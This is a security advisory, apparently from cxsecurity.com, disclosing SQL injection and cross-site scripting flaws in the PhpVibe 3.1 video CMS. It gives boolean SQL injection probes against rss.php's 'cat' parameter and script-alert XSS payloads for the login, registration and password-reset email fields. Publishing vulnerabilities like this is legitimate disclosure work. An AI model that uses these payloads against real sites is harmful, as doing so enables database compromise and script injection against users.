PhpVibe 3.1 Cross Site Scripting / SQL Injection

2013.08.16
Credit: Esac
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

########################################################################################### #Exploit Title: PhpVibe 3.1 - Multiples Vulnerabilites #Product: PhpVibe #Official site: http://phprevolution.com/ #Risk Level: High #Exploit Author: Esac #Demo : http://playviralvideos.com #Last Checked: 13/08/2013 ########################################################################################### +----------+ | OVERVIEW | +----------+ PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off. +-----------------------------------------------------------------------------------+ +---------------------------------+ | Error-Based Blind SQL Injection | +---------------------------------+ PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat Poc : http://localhost/rss.php?cat= -1' or 2='2 ==> return normal page http://localhost/rss.php?cat= -1' or 2='3 ==> return page with some errors ( or page without error but with content changed ) +---------------------------------+ The impact of this vulnerability | +---------------------------------+ An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. +--------------------------------------------------------------------------------------+ +-----------+ |XSS Attack | +-----------+ Poc : http://playviralvidXeos.com/show/'">><marquee><h1>XSS</h1></marquee> http://playviraXlvideos.com/forgot-pass.php => POST (multipart) input email was set to '">><script>alert('XSS')</script> http://playviralvXideos.com/login.php => POST (multipart) input email was set to '">><script>alert('XSS')</script> http://playviraXlvideos.com/register.php => POST (multipart) input email was set to '">><script>alert('XSS')</script> +--------------------------------------------------------------------------------------+ ==> Made In Moroco <== Greetz : White Tarbouch TEAM - Cobra ./Issam IEBOUBEN Aka Esac


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top